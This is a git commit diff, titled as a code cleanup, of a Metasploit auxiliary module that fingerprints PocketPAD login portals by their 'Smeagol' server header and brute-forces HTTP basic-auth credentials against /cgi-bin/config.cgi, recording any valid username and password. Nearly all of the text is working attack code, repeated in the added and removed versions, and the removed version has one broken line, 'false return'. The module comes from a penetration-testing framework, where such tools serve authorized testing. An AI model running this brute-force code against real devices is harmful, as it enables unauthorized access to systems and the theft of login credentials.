Clean up code
parent
d60b477f50
commit
b0bdfa7680
|
@ -7,98 +7,98 @@ require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Auxiliary::AuthBrute
|
include Msf::Auxiliary::AuthBrute
|
||||||
include Msf::Auxiliary::Scanner
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'PocketPAD Login Brute Force Utility',
|
'Name' => 'PocketPAD Login Brute Force Utility',
|
||||||
'Description' => %{
|
'Description' => %{
|
||||||
This module scans for PocketPAD login portal, and
|
This module scans for PocketPAD login portal, and
|
||||||
performs a login brute force attack to identify valid credentials.
|
performs a login brute force attack to identify valid credentials.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
|
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
))
|
||||||
end
|
|
||||||
|
|
||||||
def run_host(ip)
|
|
||||||
unless is_app_popad?
|
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("#{peer} - Starting login brute force...")
|
def run_host(ip)
|
||||||
each_user_pass do |user, pass|
|
unless is_app_popad?
|
||||||
do_login(user, pass)
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("#{peer} - Starting login brute force...")
|
||||||
|
each_user_pass do |user, pass|
|
||||||
|
do_login(user, pass)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# What's the point of running this module if the target actually isn't PocketPAD
|
||||||
|
#
|
||||||
|
|
||||||
|
def is_app_popad?
|
||||||
|
begin
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'uri' => '/',
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
|
||||||
|
vprint_error("#{peer} - HTTP Connection Failed...")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD")
|
||||||
|
vprint_good("#{peer} - Running PocketPAD application ...")
|
||||||
|
return true
|
||||||
|
else
|
||||||
|
vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Brute-force the login page
|
||||||
|
#
|
||||||
|
|
||||||
|
def do_login(user, pass)
|
||||||
|
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
|
||||||
|
begin
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'uri' => '/cgi-bin/config.cgi',
|
||||||
|
'method' => 'POST',
|
||||||
|
'authorization' => basic_auth(user,pass),
|
||||||
|
'vars_post' => {
|
||||||
|
'file' => "configindex.html"
|
||||||
|
}
|
||||||
|
})
|
||||||
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
|
||||||
|
vprint_error("#{peer} - HTTP Connection Failed...")
|
||||||
|
return :abort
|
||||||
|
end
|
||||||
|
|
||||||
|
if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol"))
|
||||||
|
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
|
||||||
|
report_hash = {
|
||||||
|
:host => rhost,
|
||||||
|
:port => rport,
|
||||||
|
:sname => 'PocketPAD Portal',
|
||||||
|
:user => user,
|
||||||
|
:pass => pass,
|
||||||
|
:active => true,
|
||||||
|
:type => 'password'
|
||||||
|
}
|
||||||
|
report_auth_info(report_hash)
|
||||||
|
return :next_user
|
||||||
|
else
|
||||||
|
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# What's the point of running this module if the target actually isn't PocketPAD
|
|
||||||
#
|
|
||||||
|
|
||||||
def is_app_popad?
|
|
||||||
begin
|
|
||||||
res = send_request_cgi(
|
|
||||||
{
|
|
||||||
'uri' => '/',
|
|
||||||
'method' => 'GET'
|
|
||||||
})
|
|
||||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
|
|
||||||
vprint_error("#{peer} - HTTP Connection Failed...")
|
|
||||||
false return
|
|
||||||
end
|
|
||||||
|
|
||||||
if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD"))
|
|
||||||
vprint_good("#{peer} - Running PocketPAD application ...")
|
|
||||||
return true
|
|
||||||
else
|
|
||||||
vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.")
|
|
||||||
return false
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Brute-force the login page
|
|
||||||
#
|
|
||||||
|
|
||||||
def do_login(user, pass)
|
|
||||||
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
|
|
||||||
begin
|
|
||||||
res = send_request_cgi(
|
|
||||||
{
|
|
||||||
'uri' => '/cgi-bin/config.cgi',
|
|
||||||
'method' => 'POST',
|
|
||||||
'authorization' => basic_auth(user,pass),
|
|
||||||
'vars_post' => {
|
|
||||||
'file' => "configindex.html"
|
|
||||||
}
|
|
||||||
})
|
|
||||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
|
|
||||||
vprint_error("#{peer} - HTTP Connection Failed...")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol"))
|
|
||||||
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
|
|
||||||
report_hash = {
|
|
||||||
:host => rhost,
|
|
||||||
:port => rport,
|
|
||||||
:sname => 'PocketPAD Portal',
|
|
||||||
:user => user,
|
|
||||||
:pass => pass,
|
|
||||||
:active => true,
|
|
||||||
:type => 'password'
|
|
||||||
}
|
|
||||||
report_auth_info(report_hash)
|
|
||||||
return :next_user
|
|
||||||
else
|
|
||||||
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
Loading…
Reference in New Issue